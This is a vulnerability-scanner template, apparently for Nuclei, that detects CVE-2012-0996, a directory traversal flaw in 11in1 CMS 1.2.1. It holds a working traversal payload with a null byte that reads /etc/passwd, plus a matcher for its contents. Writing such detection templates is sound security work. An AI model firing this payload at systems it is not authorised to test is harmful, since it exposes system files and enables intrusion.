44 lines
1.6 KiB
YAML
44 lines
1.6 KiB
YAML
id: CVE-2012-0996
|
|
|
|
info:
|
|
name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI)
|
|
author: daffainfo
|
|
severity: medium
|
|
description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.
|
|
impact: |
|
|
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and compromise of the affected system.
|
|
remediation: Upgrade to the latest version to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/36784
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2012-0996
|
|
- https://www.htbridge.ch/advisory/HTB23071
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
|
cvss-score: 5
|
|
cve-id: CVE-2012-0996
|
|
cwe-id: CWE-22
|
|
epss-score: 0.03648
|
|
epss-percentile: 0.91695
|
|
cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: 11in1
|
|
product: 11in1
|
|
tags: cve,cve2012,lfi,edb,11in1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100b3a84923297dce515a989c9a43b3bee4c8f3c31fdfb93e2d763a77022f59bf51022061e6935843ad22eb54f312956180a70d53cc44408b116d5002ef457535087934:922c64590222798bb761d5b6d8e72950 |